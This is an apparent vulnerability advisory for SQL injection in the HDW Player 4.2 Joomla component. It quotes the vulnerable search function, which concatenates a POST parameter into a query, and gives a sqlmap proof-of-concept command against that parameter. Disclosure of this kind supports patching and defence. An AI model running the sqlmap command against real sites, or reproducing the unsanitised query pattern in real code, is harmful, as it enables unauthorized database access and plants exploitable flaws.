Vulnerability File:components/com_hdwplayer/models/search.php 33 line
Vulnerability Function:getsearch()
Vulnerability Line: 33
function getsearch() {
$db = JFactory::getDBO();
$search = JRequest::getVar('hdwplayersearch', '', 'post', 'string');
$query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')";
$db->setQuery($query);
$output = $db->loadObjectList();
return($output);
}
An issue was discovered in the com_hdwplayer 4.2 for Joomla! 'search.php' SQL Injection
Homepage: https://www.hdwplayer.com/
Download: https://www.hdwplayer.com/download/
Version: hdwplayer 4.2
On: windows mysql php5.4 Joomla! 3.9
Author: Zeo
Vulnerability File:components/com_hdwplayer/models/search.php 33 line
Vulnerability Function:getsearch()
Vulnerability Line: 33
function getsearch() { $db = JFactory::getDBO();
$search = JRequest::getVar('hdwplayersearch', '', 'post', 'string');
$query = "SELECT * FROM #__hdwplayer_videos WHERE published=1 AND (title LIKE '%$search%' OR category LIKE '%$search%' OR tags LIKE '%$search%')"; $db->setQuery($query); $output = $db->loadObjectList();
return($output); }
PoC
sqlmap.py -u "http://ip/index.php" --data "option=com_hdwplayer&view=search&hdwplayersearch=xxx" -p hdwplayersearch --method=POST --dbms=mysql --level=5 --risk=3